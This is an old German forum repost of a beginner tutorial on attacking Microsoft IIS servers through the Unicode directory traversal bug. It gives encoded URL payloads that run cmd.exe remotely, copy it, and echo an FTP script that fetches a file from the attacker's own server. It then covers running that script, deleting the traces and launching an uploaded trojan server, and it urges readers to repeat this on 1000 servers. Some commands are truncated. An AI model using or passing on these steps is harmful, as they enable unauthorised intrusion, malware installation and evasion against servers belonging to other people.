IIS Hacking

Morphi1985 · 21. Dezember 2004

TUT ist NICHT von mir!!!

==================================
IIS HAcKing TuT bY GroundZero
© IHC Security Research Group
==================================

Moin FreakZ,

Heute zeig ich auch(dir) wie man den IIS bug(fehler im systems oder software) mal bisschen ausnuzt.
Also zuerst muss ihr disen bug Scannen, da macht sich der FX-Scanner ganz gut! Dieses Totorial
ist fuer Anfaenger gedacht, und zeigt nicht wie man IIS Server sploitet!

Jetzt zum eigentlichen Hacken,wenn ihr ein resul in euren scanner habt(So sieht das dann aus)

Ip (ist klar)
Hostname : (ist glaub ich auch klar)
Unicode : (der unicode der benzut wird sieht ungef?r so aus /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe kann aber auch anders sein)
Drive c space : (der Space der auf der festplatte frei ist wenn es mehrer festplatten sind steht es da auch)
ASP exploit : No
Firewall : (Ja ob der Computer ne Firewall hat wenn ja braucht ihr denn garnicht probiren ^^)

Und benuzt noch wenn es geht einen Proxy, obwohl ihr damit auch net perfekt anonym seid, aber es hilft!

So weiter gehts , wir muessen nun ein eigenes Script schreiben auf dem anderem Rechner(Hoert sich alles schwer an ist aber nicht so schwer)das macht ihr mit eurem Browser.
Und das ist der 1. schritt,geb das in euren Browser ein.
http:///##IP##/scripts/..%%35c..%%35cwin....exe?/c+dir+c:\ (oder /c+dir+d:\,/c+dir+e:\ USW )

##IP## :Sthet für die ip des gescannten server von euch.
/c+dir+c:\ :Zeig euch denn Inhalt der Festplatte an und denn Space
scripts/..%%35c..%%35cwinnt/system32/cmd.exe? :Ist der Unicode/String

Nun k?nnt ihr ein bisschen auf der Festplatte rumschauen,ok es geht weiter.

Jetzt folgt der n?chste Schritt also gebt wieder in euren Browser ein:
http://IP/scripts/..%%35c..%%35cwin...EIN\SOL
L

ABER ACHTET DARAUF IM WINNT ORDNER WENN IHR ES DA MACHT HABT IHR MACHNMAL KEINE SCHREIB RECHTE DAN WAEHLT EIN ANDERS VERZECIHNISS!

Wenn ihr nun ein anderes Verzeichniss gewaehlt habt (falls es der fall ist siehe vorigen Schritt) kontrolliert ob es auch existiert.
Den Pfad muesstet ihr nach eurem anpassen , wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich.

Weiter gehts,nun muessen wir die cmd.exe kopieren um ein Dos Echo script zu schreiben, den Command in euren Browser eingeben :
http://ip/scripts/..%%35c..%%35cwinnt/sy...+wunschname.exe

Für Wunschname.exe koennt ihr ein belibigen Namen auswaehlen aber ihr muesst dann bei den weiteren Schritten beachten dass ihr nach dem Namen das .exe nicht vergessen habt, das ist WICHTIG!!!

Jetzt kommen wir zum eigentlichen Script zum Serv-u oder andere Datei zu Geten (hochladen).
Also macht schonmal nen HomeFTP oder Pub ,Webspace bereit wo die datei liegen.
Los gehts:
1.) http://ip/scripts/wunschname.exe?/c+echo+open+ftpip+port>>c:\unser\verzeichniss\unserscriptname.txt

Für ftpip steht die ip des Webspace oder Pub etc.
Für den Port steht der Port des Webspace oder Pub etc.
Für c:\unser\verzeichniss\ dsas Verzeichniss angeben was ihr vorhin erstellet habt.

2.) http://IP/scripts/wunschname.exe?/c+echo+Anonymous>>c:\unser\verzeichniss\unserscriptname.txt

Für Anonymous denn username des Webspace oder Pub etc.

3.)http://IP/scripts/wunschname.exe?/c+echo+password>>c:\unser\verzeichniss\unserscriptname.txt

Für Password das Password vom Webspace oder Pub etc.

4.)http://IP/scripts/wunschname.exe?/c+echo+BINARY>>c:\unser\verzeichniss\unserscriptname.txt

5.)http://IP/scripts/wunschname.exe?/c+echo+get+Datei.(exe.jpg.txt.usw)>>c:\unser\verzeichniss\unserscriptname.txt

Für Datei(exe.jpg.txt.usw) die Datei die Ihr hochladen wollt vom Webspace oder Pub etc.

6.)http://IP/scripts/wunschname.exe?/c+echo+quit>>c:\unser\verzeichniss\unserscriptname.txt

Damit ihr nachdem hochladen auch dissconectet seid.

Jetzt musst ihr gucken ob das Script erfolgreich geschriben wurden ist das macht ihr mit dem befehl:
http://ip/scripts/wunschname.exe?/c+type...rscriptname.txt
Wenn euer Script richtig ist sollte es so ausehen:

IP VOM FTP SERVER&Port
USERNAME
PASSWORD
BINARY
get Datei
quit

Ok jetzt habt ihr es fast geschaft um das Script jetzt auszufuehren gebe wieder im Browser ein:
http://ip/scripts/..%%35c..%%35cwinnt/sy...rscriptname.txt

!!!Jetzt dauert es bis die Datei/en oben sind es kommt drauf an wie gro? sie sind!!!!

Leider wurde die Datei/en nicht in dein Verzeichniss Hochgeladen also mussen wir sie in dein Verzeichniss moven(verschieben),
dass macht ihr mit demm Befehl: http://IP/scripts/wunschname.exe?/c+move+Datei*.*+"c:\unser\verzeichniss\"

Fuer Datei bitte den Namen der Datei angeben die du hochgeladen hast.

Ihr habt es geschaft, ihr habt die Datei/en hochgeladen und in euer Verzeichniss kopiert

Bitte hinterlaesst keine Spuren und loescht euer Script mit dem Befehl :
http://ip/scripts/wunschname.exe?/c+del+...rscriptname.txt

Spuren Weg *geil wa*

Sooooo jetzt zum schluss um die Datei/en ausfuehren zb. einen Trojaner Server einfach:
http://ip/scripts/..%%35c..%%35cwinnt/sy...hniss\datei.exe
im Browser eingeben.

Aber jetzt habt ihr es geschaft. Und das macht ihr jetzt bei 1000 Server dann habt ihr es richtig druff *g* Augenzwinkern )

// Ich will hier net auf andere Moeglichkeiten eingehen einen IIS Server zu hacken, das es fuer Anfaenger ist! //

====================
PreSenD bY GroundZero
====================

Zum Thema passenden Artikel finden. > siehe auch Hardware Preisvergleich

IIS Hacking

Anzeige

Videos zum Thema

MSSQL: mssql_connect unter IIS8

Windows Server 2012 R2 IIS 8.0 - FXP aktivieren

IIS 7 php und java

IIS Domäne zuordnen

[Hacking] Another IIS Hacking Tut

Annonce

Annonce

Nützliche Suchen

IIS Hacking

Anzeige

Videos zum Thema

MSSQL: mssql_connect unter IIS8

Windows Server 2012 R2 IIS 8.0 - FXP aktivieren

IIS 7 php und java

IIS Domäne zuordnen

[Hacking] Another IIS Hacking Tut